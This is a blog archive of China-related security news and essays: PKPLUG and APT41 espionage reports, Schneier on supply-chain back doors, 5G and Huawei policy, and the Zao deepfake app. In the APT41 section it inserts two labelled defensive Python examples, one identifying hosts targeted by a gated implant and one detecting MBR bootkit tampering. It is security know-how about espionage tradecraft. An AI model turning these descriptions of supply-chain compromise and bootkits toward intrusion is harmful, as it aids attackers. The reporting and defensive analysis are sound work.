Category Archives: china

China has built ‘massive global data-collection ecosystem’ to boost its interests

Chinese use state-owned enterprises, local tech companies and foreign partnerships, ASPI report says

The Chinese government is sweeping up vast amounts of data from all around the world to bulwark the nation’s security, but most critically to secure the political future of the Communist party, a new report argues.

Engineering Global Consent, a policy brief by the Australian Strategic Policy Institute’s Dr Samantha Hoffman, argues that the Chinese party-state seeks to influence – and where possible control – global online and political environments so that public sentiment around the world is more favourable towards its interests. China has expanded its operations of influence into organisations such as universities in the UK, the US and Australia.


6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group

Security experts linked a number of cyber-espionage campaigns observed over the years to the same Chinese threat actor, tracked as PKPLUG.

The name comes from the threat actor delivering PlugX inside ZIP archives, whose header begins with the ASCII magic bytes “PK”.

“For three years, Unit 42 has tracked a set of cyber espionage attack campaigns across Asia, which used a mix of publicly available and custom malware. Unit 42 created the moniker “PKPLUG” for the threat actor group, or groups, behind these and other documented attacks referenced later in this report.” reads the report published by Palo Alto Networks. “We say group or groups as our current visibility doesn’t allow us to determine with high confidence if this is the work of one group, or more than one group which uses the same tools and has the same tasking.”

The hackers targeted entities in the Southeast Asia region; most of the victims were in Myanmar, Taiwan, Vietnam, and Indonesia. Experts believe PKPLUG also targeted other parts of Asia, including Tibet, Xinjiang, and Mongolia.

The China-linked APT group has been active for at least six years and has used both custom-made and publicly available malware.

Researchers at Palo Alto Networks’ Unit 42 reported that some of the tools used in the campaigns were also involved in attacks carried out by other threat actors.

The experts observed the threat actor mainly delivered the PlugX backdoor, but the attackers also used the HenBox Android malware, the Farseer backdoor for Windows, the 9002 and Zupdax trojans, and Poison Ivy RAT.

The timeline of the PKPLUG attacks over the years is as follows:

The first campaign associated with PKPLUG was observed in November 2013, when the group targeted Mongolian individuals with the PlugX RAT. In April 2016, researchers from Arbor Networks uncovered a campaign aimed at delivering Poison Ivy to targets in Myanmar and other countries in Asia. A month later, Unit 42 researchers spotted another campaign that targeted entities from Myanmar, the Uyghur minority, Tibet, Vietnam, Indonesia, and Taiwan with the 9002 Trojan.

In March 2017, the Hong Kong-based cybersecurity company VKRL spotted a campaign targeting entities in Mongolia. One year later, in March 2018, Unit 42 experts spotted a campaign involving a new Android malware family named “HenBox.” The hackers primarily targeted the Uyghur minority.

In early 2019, Unit 42 researchers discovered a previously unknown Windows backdoor Trojan called Farseer that was used by the threat actors in attacks against targets in Myanmar. Experts noticed overlaps between the infrastructure and the malware used in the different campaigns.

“Overlaps between the different campaigns documented, and the malware families used in them, exist both in infrastructure (domain names and IP addresses being reused, sometimes in multiple cases) and in terms of malicious traits (program runtime behaviors or static code characteristics are also where relationships can be found or strengthened).” continues the analysis.

In at least four of the six campaigns, the threat actors used a shared set of IP addresses as command and control (C2) infrastructure.

Researchers also discovered that attackers used the same registrant for various domain names hosted at those addresses.

“Based on what we know and what we’ve gleaned from others’ publications, and through industry sharing, PKPLUG is a threat group, or groups, operating for at least the last six years using several malware families — some more well-known: Poison Ivy, PlugX, and Zupdax; some are less well-known: 9002, HenBox, and Farseer.” concludes the analysis. “Unit 42 has been tracking the adversary for three years and based on public reporting believes with high confidence that it has origins to Chinese nation-state adversaries.”

Pierluigi Paganini

(SecurityAffairs – PKPLUG, China)


US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply

The US continues to warn its allies over China’s “predatory approach”, especially in 5G technology; this time the US Secretary of State has alerted Italy.

US Secretary of State Mike Pompeo during the recent meeting with Italian Foreign Minister Luigi Di Maio warned Italy of China’s “predatory approach” to trade and investment.

Once again the US is warning its allies over Chinese 5G technology, but the Italian Government explained that its special powers over 5G supply deals would mitigate any risk.

According to Pompeo, China and its technology pose a serious threat to the homeland security of the US and its allies.

“China has a predatory approach in trade and investment” and represents a “mutual threat” to the two countries, Pompeo explained during a joint press conference with Italy’s Foreign Minister Luigi Di Maio.

“When the Chinese Communist party shows up to make an investment to gain political power or threaten a nation’s security, that’s what needs to be protected against,” Pompeo added.

Di Maio explained that the Italian Government opted to protect its infrastructure invoking the so-called “golden powers” in supply deals for fifth-generation (5G) telecom services. According to Di Maio, the golden powers over the supply deals on technology “make [Italy] among the most advanced in Europe on security”.

“We have no intention of taking part in trade accords that might harm our sovereignty as a state,” he added.

In September, Italy exercised special powers in relation to the purchase of goods and services. The Italian government will impose conditions and technical specifications for the purchase of equipment and services for its 5G infrastructure.

In August, Romania announced that it will ban the Chinese giant Huawei from its 5G network, according to a joint statement signed by the Romanian and US presidents.

In April, the British Government approved a limited role for Huawei in the building of a national 5G network in the country, ignoring security concerns from senior ministers. In December, a Czech cyber-security agency warned against using Huawei and ZTE technologies because they pose a threat to state security.

The Chinese giant has already been excluded by several countries from building their 5G networks. The United States, Australia, New Zealand, and Japan have announced the exclusion of Huawei technology from their 5G networks.

Pierluigi Paganini

(SecurityAffairs – China, 5G)


A Look Into Continuous Efforts By Chinese Hackers to Target Foreign Governments

Phishing is still one of the most widely used strategies by cybercriminals and espionage groups to gain an initial foothold on targeted systems. Though hacking someone with a phishing attack was easy a decade ago, the evolution of threat detection technologies and cyber awareness among people has reduced the success of phishing and social engineering attacks over the years. Since phishing

Supply-Chain Security and Trust

The United States government's continuing disagreement with the Chinese company Huawei underscores a much larger problem with computer technologies in general: We have no choice but to trust them completely, and it's impossible to verify that they're trustworthy. Solving this problem -- which is increasingly a national security issue -- will require us to both make major policy changes and invent new technologies.

The Huawei problem is simple to explain. The company is based in China and subject to the rules and dictates of the Chinese government. The government could require Huawei to install back doors into the 5G routers it sells abroad, allowing the government to eavesdrop on communications or -- even worse -- take control of the routers during wartime. Since the United States will rely on those routers for all of its communications, we become vulnerable by building our 5G backbone on Huawei equipment.

It's obvious that we can't trust computer equipment from a country we don't trust, but the problem is much more pervasive than that. The computers and smartphones you use are not built in the United States. Their chips aren't made in the United States. The engineers who design and program them come from over a hundred countries. Thousands of people have the opportunity, acting alone, to slip a back door into the final product.

There's more. Open-source software packages are increasingly targeted by groups installing back doors. Fake apps in the Google Play store illustrate vulnerabilities in our software distribution systems. The NotPetya worm was distributed by a fraudulent update to a popular Ukrainian accounting package, illustrating vulnerabilities in our update systems. Hardware chips can be back-doored at the point of fabrication, even if the design is secure. The National Security Agency exploited the shipping process to subvert Cisco routers intended for the Syrian telephone company. The overall problem is that of supply-chain security, because every part of the supply chain can be attacked.

And while nation-state threats like China and Huawei -- or Russia and the antivirus company Kaspersky a couple of years earlier -- make the news, many of the vulnerabilities I described above are being exploited by cybercriminals.

Policy solutions involve forcing companies to open their technical details to inspection, including the source code of their products and the designs of their hardware. Huawei and Kaspersky have offered this sort of openness as a way to demonstrate that they are trustworthy. This is not a worthless gesture, and it helps, but it's not nearly enough. Too many back doors can evade this kind of inspection.

Technical solutions fall into two basic categories, both currently beyond our reach. One is to improve the technical inspection processes for products whose designers provide source code and hardware design specifications, and for products that arrive without any transparency information at all. In both cases, we want to verify that the end product is secure and free of back doors. Sometimes we can do this for some classes of back doors: We can inspect source code -- this is how a Linux back door was discovered and removed in 2003 -- or the hardware design, which becomes a cleverness battle between attacker and defender.

This is an area that needs more research. Today, the advantage goes to the attacker. It's hard to ensure that the hardware and software you examine is the same as what you get, and it's too easy to create back doors that slip past inspection. And while we can find and correct some of these supply-chain attacks, we won't find them all. It's a needle-in-a-haystack problem, except we don't know what a needle looks like. We need technologies, possibly based on artificial intelligence, that can inspect systems more thoroughly and faster than humans can do. We need them quickly.

The other solution is to build a secure system, even though any of its parts can be subverted. This is what the former Deputy Director of National Intelligence Sue Gordon meant in April when she said about 5G, "You have to presume a dirty network." Or more precisely, can we solve this by building trustworthy systems out of untrustworthy parts?

It sounds ridiculous on its face, but the Internet itself was a solution to a similar problem: a reliable network built out of unreliable parts. This was the result of decades of research. That research continues today, and it's how we can have highly resilient distributed systems like Google's network even though none of the individual components are particularly good. It's also the philosophy behind much of the cybersecurity industry today: systems watching one another, looking for vulnerabilities and signs of attack.

Security is a lot harder than reliability. We don't even really know how to build secure systems out of secure parts, let alone out of parts and processes that we can't trust and that are almost certainly being subverted by governments and criminals around the world. Current security technologies are nowhere near good enough, though, to defend against these increasingly sophisticated attacks. So while this is an important part of the solution, and something we need to focus research on, it's not going to solve our near-term problems.

At the same time, all of these problems are getting worse as computers and networks become more critical to personal and national security. The value of 5G isn't for you to watch videos faster; it's for things talking to things without bothering you. These things -- cars, appliances, power plants, smart cities -- increasingly affect the world in a direct physical manner. They're increasingly autonomous, using A.I. and other technologies to make decisions without human intervention. The risk from Chinese back doors into our networks and computers isn't that their government will listen in on our conversations; it's that they'll turn the power off or make all the cars crash into one another.

All of this doesn't leave us with many options for today's supply-chain problems. We still have to presume a dirty network -- as well as back-doored computers and phones -- and we can clean up only a fraction of the vulnerabilities. Citing the lack of non-Chinese alternatives for some of the communications hardware, already some are calling to abandon attempts to secure 5G from Chinese back doors and work on having secure American or European alternatives for 6G networks. It's not nearly enough to solve the problem, but it's a start.

Perhaps these half-solutions are the best we can do. Live with the problem today, and accelerate research to solve the problem for the future. These are research projects on a par with the Internet itself. They need government funding, like the Internet itself. And, also like the Internet, they're critical to national security.

Critically, these systems must be as secure as we can make them. As former FCC Commissioner Tom Wheeler has explained, there's a lot more to securing 5G than keeping Chinese equipment out of the network. This means we have to give up the fantasy that law enforcement can have back doors to aid criminal investigations without also weakening these systems. The world uses one network, and there can only be one answer: Either everyone gets to spy, or no one gets to spy. And as these systems become more critical to national security, a network secure from all eavesdroppers becomes more important.

This essay previously appeared in the New York Times.

On Chinese "Spy Trains"

The trade war with China has reached a new industry: subway cars. Congress is considering legislation that would prevent the world's largest train maker, the Chinese-owned CRRC Corporation, from competing on new contracts in the United States.

Part of the reasoning behind this legislation is economic, and stems from worries about Chinese industries undercutting the competition and dominating key global industries. But another part involves fears about national security. News articles talk about "spy trains," and the possibility that the train cars might surreptitiously monitor their passengers' faces, movements, conversations or phone calls.

This is a complicated topic. There is definitely a national security risk in buying computer infrastructure from a country you don't trust. That's why there is so much worry about Chinese-made equipment for the new 5G wireless networks.

It's also why the United States has blocked the cybersecurity company Kaspersky from selling its Russian-made antivirus products to US government agencies. Meanwhile, the chairman of China's technology giant Huawei has pointed to NSA spying disclosed by Edward Snowden as a reason to mistrust US technology companies.

The reason these threats are so real is that it's not difficult to hide surveillance or control infrastructure in computer components, and if they're not turned on, they're very difficult to find.

Like every other piece of modern machinery, modern train cars are filled with computers, and while it's certainly possible to produce a subway car with enough surveillance apparatus to turn it into a "spy train," in practice it doesn't make much sense. The risk of discovery is too great, and the payoff would be too low. Like the United States, China is more likely to try to get data from the US communications infrastructure, or from the large Internet companies that already collect data on our every move as part of their business model.

While it's unlikely that China would bother spying on commuters using subway cars, it would be much less surprising if a tech company offered free Internet on subways in exchange for surveillance and data collection. Or if the NSA used those corporate systems for their own surveillance purposes (just as the agency has spied on in-flight cell phone calls, according to an investigation by the Intercept and Le Monde, citing documents provided by Edward Snowden). That's an easier, and more fruitful, attack path.

We have credible reports that the Chinese hacked Gmail around 2010, and there are ongoing concerns about both censorship and surveillance by the Chinese social-networking company TikTok. (TikTok's parent company has told the Washington Post that the app doesn't send American users' info back to Beijing, and that the Chinese government does not influence the app's use in the United States.)

Even so, these examples illustrate an important point: there's no escaping the technology of inevitable surveillance. You have little choice but to rely on the companies that build your computers and write your software, whether in your smartphones, your 5G wireless infrastructure, or your subway cars. And those systems are so complicated that they can be secretly programmed to operate against your interests.

Last year, Le Monde reported that the Chinese government bugged the computer network of the headquarters of the African Union in Addis Ababa. China had built and outfitted the organization's new headquarters as a foreign aid gift, reportedly secretly configuring the network to send copies of confidential data to Shanghai every night between 2012 and 2017. China denied having done so, of course.

If there's any lesson from all of this, it's that everybody spies using the Internet. The United States does it. Our allies do it. Our enemies do it. Many countries do it to each other, with their success largely dependent on how sophisticated their tech industries are.

China dominates the subway car manufacturing industry because of its low prices -- the same reason it dominates the 5G hardware industry. Whether these low prices are because the companies are more efficient than their competitors or because they're being unfairly subsidized by the Chinese government is a matter to be determined at trade negotiations.

Finally, Americans must understand that higher prices are an inevitable result of banning cheaper tech products from China.

We might willingly pay the higher prices because we want domestic control of our telecommunications infrastructure. We might willingly pay more because of some protectionist belief that global trade is somehow bad. But we need to make these decisions to protect ourselves deliberately and rationally, recognizing both the risks and the costs. And while I'm worried about our 5G infrastructure built using Chinese hardware, I'm not worried about our subway cars.

This essay originally appeared on

EDITED TO ADD: I had a lot of trouble with CNN's legal department with this essay. They were very reluctant to call out the US and its allies for similar behavior, and spent a lot more time adding caveats to statements that I didn't think needed them. They wouldn't let me link to this Intercept article talking about US, French, and German infiltration of supply chains, or even the NSA document from the Snowden archives that proved the statements.

Czech Intelligence's report attributes major cyber attack to China

The Czech Intelligence agency blames China for a major cyber attack that hit a key government institution in the Czech Republic in 2018.

According to a report published by the NUKIB Czech Intelligence agency, China carried out a major cyber attack on a key government institution in the Czech Republic last year.

The report issued by the NUKIB agency states that the attack “was almost certainly carried out by a state actor or a related group,” and “a Chinese actor” is the main suspect.

In August, 2019, a parliamentary committee in the Czech Republic revealed that the National Cyber and Information Security Agency blamed a foreign state for a cyber attack that targeted the Czech Foreign Ministry.

The committee did not reveal the name of the state allegedly involved in the attack. A government source told Reuters that Czech authorities suspected the attacks originated from Russia. The Czech experts discovered the security breach in early January 2017.

Interior Minister Jan Hamacek told the CTK news agency that government infrastructure had been dealing with the cyber attack for several months.

Czech intelligence warns of cyber attacks launched by both Chinese and Russian threat actors.

“The Czech cabinet is due to discuss the findings on Monday.” reported the AFP press. “NUKIB spokesman Radek Holy told AFP the watchdog would not make the report public until then.”

Pierluigi Paganini

(SecurityAffairs – Czech Intelligence, hacking)


Scientists invent new technology to print invisible messages

Messages can only be seen under UV light and can be erased using a hairdryer

Forget lemon juice and hot irons, there is a new way to write and read invisible messages – and it can be used again and again.

The approach, developed by researchers in China, involves using water to print messages on paper coated with manganese-containing chemicals. The message, invisible to the naked eye, can be read by shining UV light on the paper.


Report: Use of AI surveillance is growing around the world

It's not just China: at least 75 out of 176 countries globally are actively using AI technologies for surveillance purposes, research shows.

Australia is confident that China was behind attack on parliament, political parties

Australia's intelligence agencies are sure that China is behind the cyberattacks that hit its parliament and political parties, but the government decided not to publicly accuse it.

According to the Reuters agency, Australia’s intelligence has evidence that the attacks that hit its parliament and political parties were orchestrated by China. However, the Australian government decided not to publicly accuse it, in order to preserve trade relations with Beijing.

Reuters cited five sources within the Australian intelligence that attributed the attacks on its national parliament and three largest political parties before the general election in May to China-linked hackers.

“Australia’s cyber intelligence agency – the Australian Signals Directorate (ASD) – concluded in March that China’s Ministry of State Security was responsible for the attack, the five people with direct knowledge of the findings of the investigation told Reuters.” reported Reuters.

“The report, which also included input from the Department of Foreign Affairs, recommended keeping the findings secret in order to avoid disrupting trade relations with Beijing, two of the people said.”


Australia disclosed the attacks in February; at the time, experts speculated about the involvement of a nation-state actor without attributing the attacks to a specific threat actor.

China is Australia’s biggest trading partner, and it is not surprising that its government gathers intelligence on it. Beijing denied any involvement in the attacks, and China’s Foreign Ministry pointed out that China is itself the target of numerous attacks.

“When investigating and determining the nature of online incidents there must be full proof of the facts, otherwise it’s just creating rumors and smearing others, pinning labels on people indiscriminately. We would like to stress that China is also a victim of internet attacks,” the Ministry told Reuters.

“China hopes that Australia can meet China halfway, and do more to benefit mutual trust and cooperation between the two countries.”

When the Australian authorities discovered the attacks, the IT staff forced a password reset for every person working at the parliament.

According to information collected by Reuters, the hackers did access private emails and policy papers from members of the Liberal, National and Labor parties.

Australian experts shared their findings with the United States and the United Kingdom, the latter sent a team of cyber experts to Canberra to help investigate the attack.

“Australian investigators found the attacker used code and techniques known to have been used by China in the past, according to the two sources.” concludes Reuters.

Pierluigi Paganini

(SecurityAffairs – Australia, hacking)


A ‘deep fake’ app will make us film stars – but will we regret our narcissism?

Users of Zao can now add themselves into the scenes of their favourite movies. But is our desire to insert ourselves into everything putting our privacy at risk?

“You oughta be in pictures,” goes the 1934 Rudy Vallée song. And, as of last week, pretty much anyone can be. The entry requirements for being a star fell dramatically thanks to the launch, in China, of a face-swapping app that can decant users into film and TV clips.

Zao, which has quickly become China’s most downloaded free app, fuses the face in the original clip with your features. All that is required is a single selfie and the man or woman in the street is transformed into a star of the mobile screen, if not quite the silver one. In other words, anyone who yearns to be part of Titanic or Game of Thrones, The Big Bang Theory or the latest J-Pop sensation can now bypass the audition and go straight to the limelight without all that pesky hard work, talent and dedication. A whole new generation of synthetic movie idols could be unleashed upon the world: a Humphrey Bogus, a Phony Curtis, a Fake Dunaway.


Chinese tech firm Huawei says it was hacked by the United States

The Chinese technology giant says the United States has launched hacking attacks against its intranet and internal network.

But attributing a cyber attack to a particular party is notoriously difficult. It would certainly be just as fascinating to see Huawei’s reasons why it believes the USA hacked it, as to see what evidence the United States has against Huawei.

Chinese deepfake app Zao sparks privacy row after going viral

Critics say face-swap app could spread misinformation on a massive scale

A Chinese app that lets users convincingly swap their faces with film or TV characters has rapidly become one of the country’s most downloaded apps, triggering a privacy row.


In case you haven't heard, #ZAO is a Chinese app which has completely blown up since Friday. Best application of 'Deepfake'-style AI facial replacement I've ever seen.

Here's an example of me as DiCaprio (generated in under 8 secs from that one photo in the thumbnail)


Uighurs in China were target of two-year iOS malware attack – reports

Android and Windows devices also targeted in campaign believed to be state-backed

Chinese Uighurs were the target of an iOS malware attack lasting more than two years that was revealed last week, according to multiple reports.

Android and Windows devices were also targeted in the campaign, which took the form of “watering hole attacks”: taking over commonly visited websites or redirecting their visitors to clones in order to indiscriminately attack each member of a community.


Healthcare: Research Data and PII Continuously Targeted by Multiple Threat Actors

The healthcare industry faces a range of threat groups and malicious activity. Given the critical role that healthcare plays within society and its relationship with our most sensitive information, the risk to this sector is especially consequential. It may also be one of the major reasons why we find healthcare to be one of the most retargeted industries.

In our new report, Beyond Compliance: Cyber Threats and Healthcare, we share an update on the types of threats observed affecting healthcare organizations: from criminal targeting of patient data to less frequent – but still high impact – cyber espionage intrusions, as well as disruptive and destructive threats. We urge you to review the full report for these insights, however, these are two key areas to keep in mind.

  • Chinese espionage targeting of medical researchers: We’ve seen medical research – specifically cancer research – continue to be a focus of multiple Chinese espionage groups. While the extent is difficult to fully assess, years of cyber-enabled theft of research trial data might be starting to have an impact, as Chinese companies are reportedly now manufacturing cancer drugs at a lower cost than Western firms.
  • Healthcare databases for sale under $2,000: The sheer number of healthcare-associated databases for sale in the underground is outrageous. Even more concerning, many of these databases can be purchased for under $2,000 (based on sales we observed over a six-month period).

To learn more about the types of financially motivated cyber threat activity impacting healthcare organizations, the nation state threats the healthcare sector should be aware of, and how the threat landscape is expected to evolve in the future, check out the full report, or listen to the podcast conversation between Principal Analyst Luke McNamara and Grady Summers, EVP, Products.

For a closer look at the latest breach and threat landscape trends facing the healthcare sector, register for our Sept. 17, 2019, webinar.

For more details around an actor who has targeted healthcare, read about our newly revealed APT group, APT41.

Chinese cyberhackers ‘blurring line between state power and crime’

Cybersecurity firm FireEye says ‘aggressive’ APT41 group working for Beijing is also hacking video games to make money

A group of state-sponsored hackers in China ran activities for personal gain at the same time as undertaking spying operations for the Chinese government in 14 different countries, the cybersecurity firm FireEye has said.

In a report released on Thursday, the company said the hacking group APT41 was different to other China-based groups tracked by security firms in that it used non-public malware typically reserved for espionage to make money through attacks on video game companies.



APT41: A Dual Espionage and Cyber Crime Operation

Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

Who Does APT41 Target?

Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.

Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.
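The gating described above can be turned around by a defender: once the hash list has been lifted from the implant, it can be matched against the asset inventory to learn which hosts were the intended targets. The following is an added example, not code from the FireEye report or from APT41's tooling. It assumes, purely for illustration, that the implant hashes the primary NIC's MAC address with MD5 and compares the result with an embedded list; the identifier type, hash function and string normalization are the first things to establish from a real sample. The inventory and the hash list in the block are constructed.

```python
"""Which inventory hosts would a gated supply-chain implant have activated on?

Added example, not code from the FireEye report or from APT41's tooling.
Illustrative assumption: the implant decides whether to fetch its second
stage by MD5-hashing the primary NIC's MAC address and comparing it with an
embedded list. The inventory and the hash list below are constructed.
"""
import hashlib
from typing import Dict, List, Set


def mac_forms(mac: str) -> List[str]:
    """Every plausible string form of one MAC address.

    Implant authors are inconsistent about case and separators, so we try
    each form instead of guessing the one they hashed.
    """
    digits = "".join(ch for ch in mac if ch.isalnum()).lower()
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    pairs = [digits[i:i + 2] for i in range(0, 12, 2)]
    forms = {
        digits,                         # 001122aabbcc
        digits.upper(),                 # 001122AABBCC
        ":".join(pairs),                # 00:11:22:aa:bb:cc
        ":".join(pairs).upper(),        # 00:11:22:AA:BB:CC
        "-".join(pairs),                # 00-11-22-aa-bb-cc
        "-".join(pairs).upper(),        # 00-11-22-AA-BB-CC (Windows ipconfig style)
    }
    return sorted(forms)


def fingerprint(value: str) -> str:
    """Hash the identifier the way the (assumed) implant does: MD5 of the ASCII string."""
    return hashlib.md5(value.encode("ascii")).hexdigest()


def find_targeted_hosts(inventory: Dict[str, str], implant_hashes: Set[str]) -> Dict[str, str]:
    """Return hostname -> the identifier form that matched, for every host on the implant's list."""
    hits: Dict[str, str] = {}
    for hostname, mac in inventory.items():
        for form in mac_forms(mac):
            if fingerprint(form) in implant_hashes:
                hits[hostname] = form
                break
    return hits


# Constructed asset inventory (hostname -> MAC as the CMDB records it).
INVENTORY = {
    "ws-finance-01": "00:11:22:aa:bb:cc",
    "ws-rnd-07": "00:11:22:dd:ee:ff",
    "srv-build-02": "a1:b2:c3:d4:e5:f6",
}

# Constructed stand-in for the hash list carved out of the implant. In a real
# case these come from the sample. Note the author hashed upper-case,
# dash-separated MACs, which is not how the inventory stores them, so a
# single-form comparison against the CMDB string would match nothing.
IMPLANT_HASHES = {
    fingerprint("00-11-22-AA-BB-CC"),
    fingerprint("A1-B2-C3-D4-E5-F6"),
    fingerprint("DE-AD-BE-EF-00-01"),  # a machine that is not ours
}

if __name__ == "__main__":
    for host, form in find_targeted_hosts(INVENTORY, IMPLANT_HASHES).items():
        print(f"{host}: intended target (matched as {form})")
```

The reason for hashing every normalization is that a single-form comparison silently misses targets whenever the implant author formatted identifiers differently from the CMDB. With a real hash list, also confirm the algorithm and whether the implant hashes the raw identifier bytes or a printed string before trusting a zero-match result.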

A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.


Figure 1: Timeline of industries directly targeted by APT41

Probable Chinese Espionage Contractors

Two identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.

Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.

Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

The Right Tool for the Job

APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.

APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.
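Because an MBR bootkit has to rewrite the first sector of the disk, that sector is also where a responder can look for it. The block below is an added example, not code from the FireEye report; it parses a 512-byte MBR by the standard layout, hashes the boot-code region and compares it with a baseline recorded while the host was known good. The sample MBR bytes and the baseline are constructed.

```python
"""Check a 512-byte MBR for boot-code tampering of the kind a bootkit needs.

Added example, not code from the FireEye report. Uses the standard MBR layout
(440 bytes of boot code, 4-byte disk signature, 2 reserved bytes, four 16-byte
partition entries, 0x55AA signature) and compares the boot-code hash with a
baseline taken when the host was known good. The sample MBRs are constructed.
"""
import hashlib
import struct
from typing import Dict, List

MBR_SIZE = 512
BOOT_CODE_LEN = 440
DISK_SIG_OFFSET = 440
PART_TABLE_OFFSET = 446
BOOT_SIGNATURE = b"\x55\xaa"


def parse_mbr(mbr: bytes) -> Dict:
    """Split an MBR into boot-code hash, disk signature and used partition entries."""
    if len(mbr) != MBR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    if mbr[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions: List[Dict] = []
    for i in range(4):
        off = PART_TABLE_OFFSET + 16 * i
        # status, CHS start (3 bytes, skipped), type, CHS end (skipped), LBA start, sector count
        status, ptype, lba_start, sectors = struct.unpack("<B3xB3xII", mbr[off:off + 16])
        if ptype != 0:
            partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": sectors})
    return {
        "boot_code_sha256": hashlib.sha256(mbr[:BOOT_CODE_LEN]).hexdigest(),
        "disk_signature": struct.unpack("<I", mbr[DISK_SIG_OFFSET:DISK_SIG_OFFSET + 4])[0],
        "partitions": partitions,
    }


def boot_code_changed(mbr: bytes, known_good_sha256: str) -> bool:
    """True when the boot code no longer matches the clean baseline."""
    return parse_mbr(mbr)["boot_code_sha256"] != known_good_sha256


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Construct a valid MBR with one bootable NTFS-type (0x07) partition, for the example."""
    code = boot_code.ljust(BOOT_CODE_LEN, b"\x00")[:BOOT_CODE_LEN]
    disk_sig = struct.pack("<I", 0xDEADBEEF) + b"\x00\x00"
    entry = struct.pack("<B3sB3sII", 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00", 2048, 1024000)
    table = entry + b"\x00" * 48  # three unused entries
    return code + disk_sig + table + BOOT_SIGNATURE


# Constructed stand-in for a vendor boot sector and the baseline hash recorded at deployment.
CLEAN_MBR = build_sample_mbr(b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c\xfb")
BASELINE_SHA256 = parse_mbr(CLEAN_MBR)["boot_code_sha256"]

# A bootkit overwrites the boot code so its own loader runs before the OS while
# leaving the partition table intact (so the machine still boots). Model that
# as a patched jump at the start of the boot code.
TAMPERED_MBR = b"\xe9\x00\x01" + CLEAN_MBR[3:]

if __name__ == "__main__":
    print("partitions:", parse_mbr(CLEAN_MBR)["partitions"])
    print("clean MBR changed:", boot_code_changed(CLEAN_MBR, BASELINE_SHA256))
    print("tampered MBR changed:", boot_code_changed(TAMPERED_MBR, BASELINE_SHA256))
```

On a live host the sector can be read with open(r'\\.\PhysicalDrive0', 'rb').read(512) as Administrator on Windows, or from /dev/sda on Linux. A bootkit that hooks disk I/O can hand the original sector back to a live reader, so the authoritative comparison is against an offline image of the disk, and a partition table that parses cleanly proves nothing about the boot code in front of it.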

Fast and Relentless

APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

Looking Ahead

APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

